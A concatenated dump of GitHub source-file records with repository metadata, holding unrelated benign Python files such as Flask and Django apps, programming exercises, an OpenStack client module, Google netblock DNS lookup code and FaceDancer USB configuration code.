self.assertEqual(inst.recorded.date, FHIRDate("2015-08-27T08:39:24+10:00").date)
self.assertEqual(inst.recorded.as_json(), "2015-08-27T08:39:24+10:00")
self.assertEqual(inst.signature[0].blob, "Li4u")
self.assertEqual(inst.signature[0].contentType, "application/signature+xml")
self.assertEqual(inst.signature[0].type[0].code, "1.2.840.10065.1.12.1.5")
self.assertEqual(inst.signature[0].type[0].display, "Verification")
self.assertEqual(inst.signature[0].type[0].system, "http://hl7.org/fhir/valueset-signature-type")
self.assertEqual(inst.signature[0].when.date, FHIRDate("2015-08-27T08:39:24+10:00").date)
self.assertEqual(inst.signature[0].when.as_json(), "2015-08-27T08:39:24+10:00")
self.assertEqual(inst.text.div, "<div>procedure record authored on 27-June 2015 by Harold Hippocrates, MD Content extracted from Referral received 26-June</div>")
self.assertEqual(inst.text.status, "generated")
|
[
"connect2nazrul@gmail.com"
] |
connect2nazrul@gmail.com
|
060cab4de8f90448bb3a7351dec20cafcc81a448
|
3b593b412c663a34784b1f60ad07cd2ee6ef87d1
|
/month01/python base/day04/exercise05.py
|
37e1bf28579cef5876ac0302e9c634075a9418dc
|
[] |
no_license
|
ShijieLiu-PR/Python_Learning
|
88694bd44aeed4f8b022202c1065342bd17c26d2
|
ed01cc0956120ea287c51667604db97ff563c829
|
refs/heads/master
| 2023-05-22T16:35:24.252313
| 2021-06-16T10:56:21
| 2021-06-16T10:56:21
| 337,445,284
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
# 练习5:在控制台中输入一个整数,根据整数打印一个正方形。如下:
"""
****
* *
* *
****
"""
size = int(input("Please input an int:"))
for item in range(size):
if item == 0 or item == size - 1:
print("*" * size)
else:
print("*" + " " * (size - 2) + "*")
|
[
"shijie_liu@outlook.com"
] |
shijie_liu@outlook.com
|
3ca4847d2fcea8e14b515ef04ca57fdbab37f57c
|
4f770819f1b9ce66c847873f02d65a7250d3c0b9
|
/myapp/test.py
|
ffb04a90d437b452a9827535e387313d97b522c9
|
[] |
no_license
|
alexaugusto23/Moscow_Ring_Road_Coordinates
|
58ec6b606679aab34d0941b7c57374071b3821ad
|
51daf7f88e9b2c02df174a44931c86afc079aeb1
|
refs/heads/main
| 2023-08-31T14:26:08.446962
| 2021-09-19T01:43:21
| 2021-09-19T01:43:21
| 405,960,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,427
|
py
|
import unittest
from app import app
import re
class TestHomeView(unittest.TestCase):
'''
As all 3 test cases do a get home "/"
from our application, we define the setUp function. she is executed
automatically whenever unittest instantiates the TestHomeView class.
The setUp function is similar to a constructor method.
'''
def setUp(self):
my_app = app.test_client()
self.response_root = my_app.get('/')
self.response_form = my_app.get('/form')
# Testamos se a resposta e 200 ("ok")
def test_get(self):
self.assertEqual(200, self.response_root.status_code)
# Testamos se o content_type da resposta da home esta correto
def test_content_type(self):
self.assertIn('text/html', self.response_root.content_type)
# Testamos se a nossa home retorna a string "ok"
def test_html_string_response(self):
string = self.response_form.data.decode('utf-8')
print(string)
padrao = "([0-9]{0,1000000000}) ([a-z]{2})"
resposta = re.search(padrao, string).group()
print(resposta)
self.assertEqual( resposta, self.response_form.data.decode('utf-8') )
if __name__ == '__main__':
log_file = 'log_file.txt'
with open(log_file, "w") as file:
runner = unittest.TextTestRunner(file)
unittest.main(testRunner=runner)
runner.close()
# python -m unittest test.py
|
[
"contato.alexaugusto@hotmail.com"
] |
contato.alexaugusto@hotmail.com
|
be1ad681d98b756c3bd0497d05278e59db83c92b
|
5017db085d3316e7954fa9beb258ab964cc0beb5
|
/netlookup/network_sets/google.py
|
6e6626a13ab2d04d3ad71db33ae57441be13b84c
|
[
"BSD-3-Clause"
] |
permissive
|
hile/netlookup
|
698e68577096fbb74daa9ba205624ddc49b357e4
|
1bc00271500d4daa279acc11590b5dcf40a0b85e
|
refs/heads/main
| 2023-07-19T20:43:42.855035
| 2023-07-09T03:02:00
| 2023-07-09T03:02:00
| 191,030,505
| 0
| 0
|
NOASSERTION
| 2023-02-11T02:23:41
| 2019-06-09T16:36:59
|
Python
|
UTF-8
|
Python
| false
| false
| 3,324
|
py
|
#
# Copyright (C) 2020-2023 by Ilkka Tuohela <hile@iki.fi>
#
# SPDX-License-Identifier: BSD-3-Clause
#
"""
Google services address prefix set
"""
import re
from datetime import datetime
from operator import attrgetter
from typing import Optional
from dns import resolver
from ..exceptions import NetworkError
from .base import NetworkSet, NetworkSetItem
RE_INCLUDE = re.compile(r'^include:(?P<rr>.*)$')
RE_IPV4 = re.compile(r'^ip4:(?P<prefix>.*)$')
RE_IPV6 = re.compile(r'^ip6:(?P<prefix>.*)$')
GOOGLE_CLOUD_ADDRESS_LIST_RECORD = '_cloud-netblocks.googleusercontent.com'
GOOGLE_SERVICES_ADDRESS_LIST_RECORD = '_spf.google.com'
def google_rr_dns_query(record: str) -> Optional[str]:
"""
DNS query to get TXT record list of google networks
"""
try:
res = resolver.resolve(record, 'TXT')
return str(res.rrset[0].strings[0], 'utf-8')
except (resolver.NoAnswer, resolver.NXDOMAIN) as error:
raise NetworkError(f'Error querying TXT record for {record}: {error}') from error
def process_google_rr_ranges(record: str, loader_class):
"""
Process RR records from google DNS query response
"""
networks = []
includes = []
for field in google_rr_dns_query(record).split(' '):
match = RE_IPV4.match(field)
if match:
networks.append(loader_class(match.groupdict()['prefix']))
continue
match = RE_IPV6.match(field)
if match:
networks.append(loader_class(match.groupdict()['prefix']))
continue
match = RE_INCLUDE.match(field)
if match:
include = match.groupdict()['rr']
networks.extend(
process_google_rr_ranges(include, loader_class)
)
includes.append(include)
continue
return networks
class GoogleNetworkSet(NetworkSet):
"""
Google network set with data for TXT DNS records
"""
@property
def __address_list_record__(self) -> None:
raise NotImplementedError
def fetch(self) -> None:
"""
Fetch Google Cloud network records from DNS
"""
self.__networks__.clear()
networks = process_google_rr_ranges(self.__address_list_record__, self.loader_class)
for network in networks:
self.__networks__.append(network)
self.updated = datetime.now()
self.__networks__.sort(key=attrgetter('version', 'cidr'))
class GoogleCloudPrefix(NetworkSetItem):
"""
Google cloud network prefix
"""
type = 'google-cloud'
class GoogleCloud(GoogleNetworkSet):
"""
Google Cloud address ranges
"""
type: str = 'google-cloud'
cache_filename: str = 'google-cloud-networks.json'
loader_class = GoogleCloudPrefix
@property
def __address_list_record__(self) -> str:
return GOOGLE_CLOUD_ADDRESS_LIST_RECORD
class GoogleServicePrefix(NetworkSetItem):
"""
Google services network prefix
"""
type = 'google'
class GoogleServices(GoogleNetworkSet):
"""
Google services address ranges
"""
type: str = 'google'
cache_filename: str = 'google-service-networks.json'
loader_class = GoogleServicePrefix
@property
def __address_list_record__(self) -> str:
return GOOGLE_SERVICES_ADDRESS_LIST_RECORD
|
[
"hile@iki.fi"
] |
hile@iki.fi
|
1c9ad65b85f7f793307ac30b98a6775a9dee079b
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_173/ch20_2020_03_04_20_04_41_273583.py
|
24e06e78098124022a59a5bfb6d4b88ca932758a
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 188
|
py
|
distancia = float(input('Escreva a distância que você quer percorrer em km'))
if distancia <= 200:
valor = 0.5*distancia
else:
valor = 0.45*distancia + 100
print (distancia)
|
[
"you@example.com"
] |
you@example.com
|
3a7381f58e016c17acdda37ca348942621b67a30
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02269/s429567531.py
|
b6858b987c9d3f9e958f07c18273052b8af703cd
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 352
|
py
|
def insert(S, string):
S.add(string)
def find(S, string):
if string in S:
print 'yes'
else:
print 'no'
n = input()
S = set()
for i in range(n):
tmp1, tmp2 = map(str, raw_input().split())
if tmp1 == 'insert':
insert(S, tmp2)
elif tmp1 == 'find':
find(S, tmp2)
else:
print 'error!'
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
ef505cea73e5c3037f00f3f90d9413b53a1b61a9
|
f5d43e47e375d6d337b919b8eb7f3393e4687864
|
/lpthw/31-40/ex40_test.py
|
989e12ee9cc1788d320fcf11b770a64ba098454b
|
[] |
no_license
|
Cadols/LearnPython
|
4a2c202b30a1d877ec75e0ec45b03f9f1c2bc52a
|
2ab5cefe1f7e2c0393489e3d1d4d0c88557c2ebb
|
refs/heads/master
| 2021-01-12T09:49:48.335014
| 2019-05-24T06:53:42
| 2019-05-24T06:53:42
| 76,265,981
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,081
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class Song(object):
def __init__(self, lyrics):
self.lyrics = lyrics
def sing_me_a_song(self):
for line in self.lyrics:
print(line)
twinkle_twinkle_little_star = Song(["Twinkle twinkle little star",
"How I wonder what you are",
"Up above in the sky",
"Like a diamond in the sky"])
alphabet_song = Song(["A B C D E F G",
"H I J K L M N",
"O P Q",
"R S T",
"U V W",
"X Y Z"])
twinkle_twinkle_little_star.sing_me_a_song()
alphabet_song.sing_me_a_song()
song_a_lyrics = ["Twinkle twinkle little star", "How I wonder what you are", "Up above in the sky", "Like a diamond in the sky"]
song_b_lyrics = ["A B C D E F G", "H I J K L M N", "O P Q", "R S T", "U V W", "X Y Z"]
song_a = Song(song_a_lyrics)
song_b = Song(song_b_lyrics)
song_a.sing_me_a_song()
song_b.sing_me_a_song()
|
[
"wangwei150@gmail.com"
] |
wangwei150@gmail.com
|
39420f4dd8ab7e282152b8a385260ae3dba14513
|
a5c4e1ab36972c0bbc2526612a9ade95768b32b1
|
/ailtdou/main/views.py
|
0b1bc567a56e9b5a702bf5eee1b8e4cb4008b087
|
[] |
no_license
|
tonyseek/ailtdou
|
5587e76e3c34b3533c73d2acded5b8134bbd8ad3
|
435cad7fd127a6fc7974b1413ec0299ca2dd359d
|
refs/heads/master
| 2021-01-23T00:14:55.509037
| 2018-10-13T12:46:27
| 2018-10-13T12:46:27
| 19,821,141
| 0
| 0
| null | 2018-08-14T07:14:38
| 2014-05-15T13:54:50
|
Python
|
UTF-8
|
Python
| false
| false
| 286
|
py
|
from flask import Blueprint, render_template
from flask_login import current_user
bp = Blueprint('main', __name__)
@bp.route('/')
def home():
if current_user.is_anonymous():
return render_template('login.html')
return render_template('user.html', user=current_user)
|
[
"tonyseek@gmail.com"
] |
tonyseek@gmail.com
|
c6443e9e4d16553be2ab62035dacb3504dc0b0e7
|
94ca446c0f17d640f45941fa7c83530ef2fbc099
|
/wrs-remote-clients-2.0.2/python-openstackclient-3.12.0/build/lib/openstackclient/network/v2/setting.py
|
d404325e8ea16391d3a58e77a79b68bf48806a91
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
rmoorewrs/tic-windows-remote-clients
|
c1c2b8924e90ffd2951571bc098ec9873ffd3988
|
ae16ee78a720852304d79f8b86dfe44e920cc72d
|
refs/heads/master
| 2023-05-25T13:55:55.603100
| 2019-05-31T20:59:28
| 2019-05-31T20:59:28
| 189,649,925
| 0
| 0
|
NOASSERTION
| 2023-05-22T20:43:59
| 2019-05-31T19:46:28
|
Python
|
UTF-8
|
Python
| false
| false
| 6,210
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2016 Wind River Systems, Inc.
#
# The right to copy, distribute, modify, or otherwise make use
# of this software may be licensed only pursuant to the terms
# of an applicable Wind River license agreement.
#
"""Settings action implementations"""
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
from openstackclient.identity import common as identity_common
from openstackclient.network import common
from openstackclient.network import sdk_utils
_formatters = {}
def _get_columns(item):
column_map = {"id": "project_id"}
invisible_columns = ["name"]
return sdk_utils.get_osc_show_columns_for_sdk_resource(item, column_map,
invisible_columns)
def _get_attrs(client_manager, parsed_args):
attrs = {key: parsed_args[key] for key in ["mac_filtering"]
if key in parsed_args}
if 'project' in parsed_args and parsed_args["project"] is not None:
identity_client = client_manager.identity
project_id = identity_common.find_project(
identity_client,
parsed_args["project"]
).id
attrs['project_id'] = project_id
return attrs
class ListSetting(common.NetworkAndComputeLister):
"""List settings of all projects who have non-default setting values"""
def update_parser_common(self, parser):
return parser
def take_action_network(self, client, parsed_args):
columns = (
'mac_filtering',
'project_id'
)
column_headers = (
'Mac Filtering',
'Project ID'
)
args = {}
data = client.settings(**args)
return (column_headers,
(utils.get_item_properties(
s, columns,
formatters=_formatters,
) for s in data))
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs access to"
" a network endpoint.")
return
class ShowSetting(common.NetworkAndComputeShowOne):
"""Show settings of a given project"""
def update_parser_common(self, parser):
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
return parser
def take_action_network(self, client, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
obj = client.find_setting(project_id, ignore_missing=False)
display_columns, columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns, formatters=_formatters)
return (display_columns, data)
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs access to"
" a network endpoint.")
return
# this one uses NetworkAndComputeCommand because settings can be deleted
# without a project id
class DeleteSetting(common.NetworkAndComputeCommand):
"""Delete setting"""
def update_parser_common(self, parser):
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
return parser
def take_action_network(self, client, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
client.delete_setting(project_id)
return
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs "
"access to a network endpoint.")
return
class UpdateSetting(command.Command):
"""Set setting properties"""
def get_parser(self, prog_name):
parser = super(UpdateSetting, self).get_parser(prog_name)
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
parser.add_argument('--mac-filtering', metavar='mac_filtering',
help="Enable/Disable source MAC filtering"
" on all ports",
required=True)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
del args['project_id']
client.find_setting(project_id, ignore_missing=False)
if args == {}:
msg = "Nothing specified to be set"
raise exceptions.CommandError(msg)
client.update_setting(project_id, **args)
return
|
[
"rmoorewrs@gmail.com"
] |
rmoorewrs@gmail.com
|
108663704ef930b8ae22d2ab13c3c6ab61c0cef9
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_3/Sean223/verify.py
|
9ca777f0f93c2d4c309547e0376387d1fabe7ab7
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,426
|
py
|
IN_FILE = "large.txt"
with open(IN_FILE, 'r') as fileIn:
fileLines = fileIn.readlines()
it = iter(fileLines)
assert(next(it).strip() == 'Case #1:')
jamcoins_found = []
for i in range(1, 501):
message = "Jamcoin on line " + str(i)
line = next(it).strip().split()
if not len(line) == 10:
print(message + " had the wrong number of divisors listed!")
jamcoin = line[0]
if jamcoin in jamcoins_found:
print(message + " was a duplicate!!")
jamcoins_found.append(jamcoin)
if not jamcoin[0] == '1':
print(message + " did not start with 1!")
if not jamcoin[-1] == '1':
print(message + " did not end with 1!")
for digit in jamcoin:
if digit not in ('0', '1'):
print(message + " had a non-binary digit!")
if not len(jamcoin) == 32:
print(message + " did not have 32 digits!")
for base in range(2, 11):
proposed_divisor = int(line[base-1])
jamcoin_in_base = int(jamcoin, base)
if proposed_divisor == 1 or proposed_divisor == jamcoin_in_base:
print(message + " had a trivial divisor listed for base " + str(base))
if not jamcoin_in_base % proposed_divisor == 0:
print(message + " did not have a correct divisor listed for base " + str(base))
if not len(jamcoins_found) == 500:
print("Did not find 500 jamcoins!")
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
0bc0c90132733dee274a4c250af2557a3807546b
|
5574620c834f96d4baf50d6aa349242dae7c17af
|
/172.factorial-trailing-zeroes.py
|
37c2400fe3fdb6a94b967b7880dcca016d4f563b
|
[] |
no_license
|
Ming-H/leetcode
|
52dceba5f9a605afbdaa65e286a37205873e21bb
|
057cee4b830603ac12976ed7d5cea8d06a9b46a0
|
refs/heads/main
| 2023-09-02T21:30:48.796395
| 2023-09-01T01:59:48
| 2023-09-01T01:59:48
| 489,290,172
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
#
# @lc app=leetcode id=172 lang=python3
#
# [172] Factorial Trailing Zeroes
#
# @lc code=start
class Solution:
def trailingZeroes(self, n: int) -> int:
r = 0
while n > 0:
n //= 5
r += n
return r
# @lc code=end
|
[
"1518246548@qq.com"
] |
1518246548@qq.com
|
332a6d9bcc8114a3fcffb46b452697f41f952e04
|
eee51854656ede694c121c7102cd2e737ea7e702
|
/demo/api.py
|
7746564cca4056932d685fcbb13988dcbb3db79d
|
[] |
no_license
|
degerli/betahealth-wagtail-demo
|
cb99f26219fede384a44e3af5e597de40c1ab1e2
|
1cb16c2fdc877778e645bdb11ba69f6418900e26
|
refs/heads/master
| 2020-04-23T04:03:47.038341
| 2016-10-05T09:05:40
| 2016-10-05T09:05:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,187
|
py
|
from django.core.urlresolvers import reverse
from rest_framework import serializers
from wagtail.api.v2.endpoints import PagesAPIEndpoint as WagtailPagesAPIEndpoint
from wagtail.api.v2.router import WagtailAPIRouter
from wagtail.wagtailimages.api.v2.endpoints import ImagesAPIEndpoint as WagtailImagesAPIEndpoint
from wagtail.wagtailimages.api.v2.serializers import ImageSerializer as WagtailImageSerializer
from wagtail.wagtailimages.utils import generate_signature
from wagtail.wagtaildocs.api.v2.endpoints import DocumentsAPIEndpoint
api_router = WagtailAPIRouter('wagtailapi')
class PagesAPIEndpoint(WagtailPagesAPIEndpoint):
meta_fields = WagtailPagesAPIEndpoint.meta_fields + [
'url_path'
]
listing_default_fields = WagtailPagesAPIEndpoint.listing_default_fields + [
'url_path'
]
def generate_image_url(image, filter_spec):
signature = generate_signature(image.id, filter_spec)
url = reverse('wagtailimages_serve', args=(signature, image.id, filter_spec))
# Append image's original filename to the URL (optional)
url += image.file.name[len('original_images/'):]
return url
class ImageSerializer(WagtailImageSerializer):
def _get_url_x(self, obj, width):
return generate_image_url(obj, 'width-{}'.format(width))
def get_url_400(self, obj):
return self._get_url_x(obj, 400)
def get_url_640(self, obj):
return self._get_url_x(obj, 640)
def get_url_800(self, obj):
return self._get_url_x(obj, 800)
def get_url_1280(self, obj):
return self._get_url_x(obj, 1280)
url_400 = serializers.SerializerMethodField()
url_640 = serializers.SerializerMethodField()
url_800 = serializers.SerializerMethodField()
url_1280 = serializers.SerializerMethodField()
class ImagesAPIEndpoint(WagtailImagesAPIEndpoint):
base_serializer_class = ImageSerializer
meta_fields = WagtailImagesAPIEndpoint.meta_fields + [
'url_400', 'url_640', 'url_800', 'url_1280'
]
api_router.register_endpoint('pages', PagesAPIEndpoint)
api_router.register_endpoint('images', ImagesAPIEndpoint)
api_router.register_endpoint('documents', DocumentsAPIEndpoint)
|
[
"marcofucci@gmail.com"
] |
marcofucci@gmail.com
|
c30d008b2918bfa5283316eabf5fe2b6a9f523b6
|
d857b65117378d9f35eb062bd1d2ddbb87f11709
|
/shows_app/urls.py
|
53313358ebf3b9d517d23b37c79a6065b06303d1
|
[] |
no_license
|
JesusGarcia86/shows_proj
|
e2bd646df88e8380a6bbebebc073cd8f59520be7
|
3e6ad462d603d78241b259a6ff713e1f08b6201e
|
refs/heads/main
| 2023-03-21T22:07:34.029715
| 2021-03-15T16:27:41
| 2021-03-15T16:27:41
| 348,043,794
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('shows/', views.index),
path('new', views.new),
path('shows/create', views.create),
path('<int:show_id>/edit', views.edit),
path('shows/<int:show_id>/update', views.update),
path('<int:show_id>', views.show),
path('<int:show_id>/delete', views.delete),
]
|
[
"the_sampritas@hotmail.com"
] |
the_sampritas@hotmail.com
|
925d1fac6a3242c64f799762acf35762a7142c23
|
117442c662cad35375630a8a800d48f8ba53888b
|
/facedancer/future/configuration.py
|
77a35088ccb06c6fe79ae8e8ae75c099dce011b6
|
[
"BSD-3-Clause"
] |
permissive
|
walidbarakat/Facedancer
|
b9a09322541dd320cadefd063888030c9eb4192e
|
28d3a900179e9dd280e007026a68fbdf97e4e35a
|
refs/heads/master
| 2023-03-06T14:05:37.479626
| 2021-02-18T02:23:53
| 2021-02-18T02:23:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,304
|
py
|
#
# This file is part of FaceDancer.
#
""" Functionality for describing USB device configurations. """
from dataclasses import dataclass, field
from typing import Iterable
from .types import USBDirection
from .magic import instantiate_subordinates, AutoInstantiable
from .request import USBRequestHandler
from .interface import USBInterface
from .descriptor import USBDescribable
from .endpoint import USBEndpoint
@dataclass
class USBConfiguration(USBDescribable, AutoInstantiable, USBRequestHandler):
""" Class representing a USBDevice's configuration.
Fields:
number -- The configuration's number; one-indexed.
configuration_string -- A string describing the configuration; or None if not provided.
max_power -- The maximum power expected to be drawn by the device when using
this interface, in mA. Typically 500mA, for maximum possible.
supports_remote_wakeup -- True iff this device should be able to wake the host from suspend.
"""
DESCRIPTOR_TYPE_NUMBER = 0x02
DESCRIPTOR_SIZE_BYTES = 9
number : int = 1
configuration_string : str = None
max_power : int = 500
self_powered : bool = True
supports_remote_wakeup : bool = True
parent : USBDescribable = None
interfaces : USBInterface = field(default_factory=dict)
def __post_init__(self):
# Gather any interfaces defined on the object.
self.interfaces.update(instantiate_subordinates(self, USBInterface))
@property
def attributes(self):
""" Retrives the "attributes" composite word. """
# Start off with the required bits set to one...
attributes = 0b10000000
# ... and then add in our attributes.
attributes |= (1 << 6) if self.self_powered else 0
attributes |= (1 << 5) if self.supports_remote_wakeup else 0
return attributes
#
# User API.
#
def get_device(self):
""" Returns a reference to the associated device."""
return self.parent
def add_interface(self, interface: USBInterface):
""" Adds an interface to the configuration. """
self.interfaces[interface.number] = interface
interface.parent = self
def get_endpoint(self, number: int, direction: USBDirection) -> USBEndpoint:
""" Attempts to find an endpoint with the given number + direction.
Paramters:
number -- The endpoint number to look for.
direction -- Whether to look for an IN or OUT endpoint.
"""
# Search each of our interfaces for the relevant endpoint.
for interface in self.interfaces.values():
endpoint = interface.get_endpoint(number, direction)
if endpoint is not None:
return endpoint
# If none have one, return None.
return None
#
# Event handlers.
#
def handle_data_received(self, endpoint: USBEndpoint, data: bytes):
""" Handler for receipt of non-control request data.
Typically, this method will delegate any data received to the
appropriate configuration/interface/endpoint. If overridden, the
overriding function will receive all data; and can delegate it by
calling the `.handle_data_received` method on `self.configuration`.
Parameters:
endpoint -- The endpoint on which the data was received.
data -- The raw bytes received on the relevant endpoint.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.OUT):
interface.handle_data_received(endpoint, data)
return
# If no interface owned the targeted endpoint, consider the data unexpected.
self.get_device().handle_unexpected_data_received(endpoint.number, data)
def handle_data_requested(self, endpoint: USBEndpoint):
""" Handler called when the host requests data on a non-control endpoint.
Typically, this method will delegate the request to the appropriate
interface+endpoint. If overridden, the overriding function will receive
all data.
Parameters:
endpoint_number -- The endpoint number on which the host requested data.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.IN):
interface.handle_data_requested(endpoint)
return
# If no one interface owned the targeted endpoint, consider the data unexpected.
self.get_device().handle_unexpected_data_requested(endpoint.number)
def handle_buffer_empty(self, endpoint: USBEndpoint):
""" Handler called when a given endpoint first has an empty buffer.
Often, an empty buffer indicates an opportunity to queue data
for sending ('prime an endpoint'), but doesn't necessarily mean
that the host is planning on reading the data.
This function is called only once per buffer.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.IN):
interface.handle_buffer_empty(endpoint)
return
#
# Backend interface functions.
#
def get_interfaces(self) -> Iterable[USBInterface]:
""" Returns an iterable over all interfaces on the provided device. """
return self.interfaces.values()
def get_descriptor(self) -> bytes:
""" Returns this configurations's configuration descriptor, including subordinates. """
interface_descriptors = bytearray()
# FIXME: use construct
# All all subordinate descriptors together to create a big subordinate desciptor.
interfaces = sorted(self.interfaces.values(), key=lambda item: item.number)
for interface in interfaces:
interface_descriptors += interface.get_descriptor()
total_len = len(interface_descriptors) + 9
string_manager = self.get_device().strings
# Build the core interface descriptor.
d = bytes([
9, # length of descriptor in bytes
2, # descriptor type 2 == configuration
total_len & 0xff,
(total_len >> 8) & 0xff,
len(set(interface.number for interface in self.interfaces.values())),
self.number,
string_manager.get_index(self.configuration_string),
self.attributes,
self.max_power // 2
])
return d + interface_descriptors
#
# Interfacing functions for AutoInstantiable.
#
def get_identifier(self) -> int:
return self.number
#
# Backend functions for our RequestHandler class.
#
def _request_handlers(self) -> Iterable[callable]:
return ()
def _get_subordinate_handlers(self) -> Iterable[USBInterface]:
return self.interfaces.values()
|
[
"k@ktemkin.com"
] |
k@ktemkin.com
|
7b2de2370af01dcc4b23681e70b09bab35acf286
|
3c5c4c4fb296d08e9e984c4a60ae4fa147293e9a
|
/ceres/__init__.py
|
b359ff8e73e6e5bd29908753a42b11e1a2d10ffa
|
[
"Apache-2.0"
] |
permissive
|
signingup/ceres-combineharvester
|
a8874ab11145e7ba2223b85483b96dea01054ad0
|
aad918a03a4a522e0e2f3bac104d19d693d6bf79
|
refs/heads/main
| 2023-07-25T04:11:13.765471
| 2021-09-09T14:59:48
| 2021-09-09T14:59:48
| 404,918,382
| 1
| 0
|
Apache-2.0
| 2021-09-10T01:22:20
| 2021-09-10T01:22:20
| null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
from pkg_resources import DistributionNotFound, get_distribution, resource_filename
try:
__version__ = get_distribution("ceres-blockchain").version
except DistributionNotFound:
# package is not installed
__version__ = "unknown"
PYINSTALLER_SPEC_PATH = resource_filename("ceres", "pyinstaller.spec")
|
[
"hulatang_eric@163.com"
] |
hulatang_eric@163.com
|
342ff27bcaab154241f7bca43ea75b8295f3c8d7
|
46ae8264edb9098c9875d2a0a508bc071201ec8b
|
/res/scripts/client/gui/shared/fortificationsevents_dispatcher.py
|
9b512b64b33ac34107ebb1d85b90c156e30e520c
|
[] |
no_license
|
Difrex/wotsdk
|
1fc6156e07e3a5302e6f78eafdea9bec4c897cfb
|
510a34c67b8f4c02168a9830d23f5b00068d155b
|
refs/heads/master
| 2021-01-01T19:12:03.592888
| 2016-10-08T12:06:04
| 2016-10-08T12:06:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 684
|
py
|
# Embedded file name: scripts/client/gui/shared/fortifications/events_dispatcher.py
from gui.shared import g_eventBus, events, EVENT_BUS_SCOPE
from gui.Scaleform.genConsts.FORTIFICATION_ALIASES import FORTIFICATION_ALIASES
def showFortBattleRoomWindow():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORT_BATTLE_ROOM_WINDOW_ALIAS), EVENT_BUS_SCOPE.LOBBY)
def showBattleConsumesIntro():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORT_COMBAT_RESERVES_INTRO_ALIAS), EVENT_BUS_SCOPE.LOBBY)
def loadFortView():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORTIFICATIONS_VIEW_ALIAS), EVENT_BUS_SCOPE.LOBBY)
|
[
"m4rtijn@gmail.com"
] |
m4rtijn@gmail.com
|
a1b36a3d3e2be1c2571e3bb379ed9f067af445c8
|
d93159d0784fc489a5066d3ee592e6c9563b228b
|
/PhysicsTools/PatAlgos/python/recoLayer0/jetCorrections_cff.py
|
6370ee93dd1381a7b0af0826f92278a56fb92a94
|
[] |
permissive
|
simonecid/cmssw
|
86396e31d41a003a179690f8c322e82e250e33b2
|
